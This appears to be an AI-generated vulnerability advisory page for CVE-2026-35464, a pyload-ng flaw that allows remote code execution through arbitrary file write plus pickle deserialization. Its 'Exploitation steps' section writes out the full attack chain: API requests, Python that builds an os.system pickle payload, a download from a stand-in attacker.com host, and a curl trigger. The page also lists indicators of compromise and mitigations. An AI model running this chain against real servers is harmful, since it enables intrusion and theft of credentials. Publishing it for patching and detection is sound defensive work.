CVE-2026-35464: 
Python vulnerability analysis and mitigation

Overview

CVE-2026-35464 is an incomplete fix vulnerability in pyload (pyload-ng) that enables arbitrary file write to the Flask filesystem session store, leading to remote code execution via pickle deserialization. It represents a bypass of the patch for CVE-2026-33509 (GHSA-r7mc-x6x7-cqxx), which introduced an ADMIN_ONLY_OPTIONS set that omitted the storage_folder configuration option. Affected versions are pyload-ng ≤ 0.5.0b3. The vulnerability was published on April 2, 2026 by researcher GammaC0de and added to the GitHub Advisory Database on April 4, 2026. It carries a CVSS v3.1 base score of 7.5 (High) (GitHub Advisory).

Technical details

The root cause is a combination of CWE-863 (Incorrect Authorization) and CWE-502 (Deserialization of Untrusted Data). The set_config_value() API endpoint at src/pyload/core/api/__init__.py performs a path restriction check on storage_folder using os.path.realpath, blocking paths inside PKGDIR or userdir, but the Flask filesystem session directory (/tmp/pyLoad/flask/ in the standard Docker deployment) falls outside both restricted paths, so the check passes. pyload configures Flask with SESSION_TYPE = "filesystem", and the cachelib FileSystemCache stores session files named as md5("session:" + session_id) and deserializes them via pickle.load() on every request carrying the corresponding session cookie. An attacker with SETTINGS and ADD permissions can redirect the download directory to the Flask session store, plant a crafted pickle payload as a predictable session file, and trigger deserialization unauthenticated by sending any HTTP request with the matching session cookie. A complete, step-by-step proof-of-concept is published in the GitHub security advisory (GitHub Advisory, Patch Commit).

Impact

Successful exploitation allows a non-admin user with SETTINGS and ADD permissions to execute arbitrary commands as the pyload service user, with the final deserialization trigger requiring no authentication at all. An attacker can read environment variables (including API keys and credentials), access the filesystem (download history, user database), and pivot to other network resources accessible from the pyload host. The full confidentiality, integrity, and availability of the pyload instance and potentially connected systems are at risk (GitHub Advisory).

Exploitability

A detailed, step-by-step proof-of-concept exploit is publicly available in the GitHub security advisory, demonstrated against the lscr.io/linuxserver/pyload-ng:latest Docker image, including concrete HTTP requests and payload generation code (GitHub Advisory). As of the time of reporting, there is no confirmed evidence of in-the-wild exploitation. The EPSS score is approximately 0.081% (23rd percentile), indicating a currently low but non-negligible probability of exploitation in the next 30 days. The vulnerability is not listed in the CISA KEV catalog. Qualys has added detection for this CVE (detection ID 5010436) (Feedly).

Exploitation steps

  1. Authenticate as a low-privilege user: Obtain credentials for a pyload account with both SETTINGS and ADD permissions (non-admin). Authenticate via POST /api/login to obtain a session cookie.

  2. Redirect the download directory to the Flask session store: Send a POST request to redirect storage_folder to the Flask session directory:

POST /api/set_config_value
{"section":"core","category":"general","option":"storage_folder","value":"/tmp/pyLoad/flask"}

The path check passes because /tmp/pyLoad/flask/ is outside both PKGDIR and userdir.

  1. Compute the target session filename: Choose an arbitrary session ID (e.g., ATTACKER_SESSION_ID) and compute the filename as md5("session:" + session_id). For example: md5("session:ATTACKER_SESSION_ID") = 92912f771df217fb6fbfded6705dd47c.

  2. Craft and host a malicious pickle payload: Generate a pickle payload with an embedded RCE gadget and prepend the 4-byte cachelib timeout header:

import pickle, os, struct
class RCE:
    def __reduce__(self):
        return (os.system, ("id > /tmp/pyload-rce-success",))
session = {"_permanent": True, "rce": RCE()}
payload = struct.pack("I", 0) + pickle.dumps(session, protocol=2)

Serve the payload file at http://attacker.com/92912f771df217fb6fbfded6705dd47c.

  1. Trigger pyload to download the payload: Submit the attacker-hosted URL as a download package:
POST /api/add_package
{"name":"x","links":["http://attacker.com/92912f771df217fb6fbfded6705dd47c"],"dest":1}

The file is saved to /tmp/pyLoad/flask/92912f771df217fb6fbfded6705dd47c.

  1. Trigger unauthenticated deserialization: Send any HTTP request to the target with the crafted session cookie:
curl http://target:8000/ -b "pyload_session_8000=ATTACKER_SESSION_ID"

Flask loads the session file, cachelib calls pickle.load(), and the RCE gadget executes as the pyload service user (GitHub Advisory).

Indicators of compromise

  • Network: Unexpected outbound HTTP requests from the pyload server to attacker-controlled hosts serving files named as 32-character hex strings (MD5 hashes); unusual POST requests to /api/set_config_value with storage_folder set to /tmp/pyLoad/flask or similar temp directories; POST requests to /api/add_package with external URLs pointing to hex-named files.
  • File System: Presence of unexpected files in /tmp/pyLoad/flask/ with names matching the pattern of MD5 hashes (32 hex characters); new or modified files in the pyload temp directory with pickle-format content (binary data starting with \x80\x02 or similar pickle opcodes); unexpected output files such as /tmp/pyload-rce-success or similar artifacts from executed payloads.
  • Logs: pyload access logs showing POST /api/set_config_value with storage_folder value pointing to Flask session directories; download history entries for URLs hosted on unknown external servers with MD5-hash filenames; Flask session deserialization errors or unexpected session file loads in application logs.
  • Process: Unusual child processes spawned by the pyload Python process (e.g., /bin/sh, bash, curl, wget, python) not associated with normal download activity; unexpected network connections initiated by the pyload process user (GitHub Advisory).

Mitigation and workarounds

The fix is implemented in commit c4cf995 which adds ("general", "storage_folder") to the ADMIN_ONLY_CORE_OPTIONS set, preventing non-admin users from modifying this setting. Users should update pyload-ng to a version incorporating commit c4cf995 (post-2026-04-02 builds). As an immediate workaround, restrict SETTINGS and ADD permissions to fully trusted users only, since the attack chain requires both permissions. Additionally, monitor the Flask session directory (/tmp/pyLoad/flask/) for unexpected files and consider restricting network egress from the pyload process to limit payload retrieval (GitHub Advisory, Patch Commit).

Community reactions

The vulnerability was reported by researcher kodareef5 and published by GammaC0de to the pyload security advisory database on April 2, 2026. A Mastodon post from The Hacker Wire noted the CVE shortly after NVD publication. No major vendor statements or significant media coverage beyond the GitHub advisory and standard vulnerability database entries have been identified (GitHub Advisory).

Additional resources


Source: This report was generated using AI

Related Python vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-v2f8-6655-7grjCRITICAL10
  • Python logoPython
  • vibe-trading-ai
NoYesOct 02, 2026
CVE-2026-105782HIGH7.5
  • Python logoPython
  • scrapy
NoYesOct 06, 2026
GHSA-v853-p72q-4cfwHIGH7.5
  • Python logoPython
  • quart
NoYesOct 05, 2026
CVE-2026-105751MEDIUM6.9
  • Python logoPython
  • docling
NoYesOct 05, 2026
CVE-2026-105750MEDIUM5.9
  • Python logoPython
  • docling
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management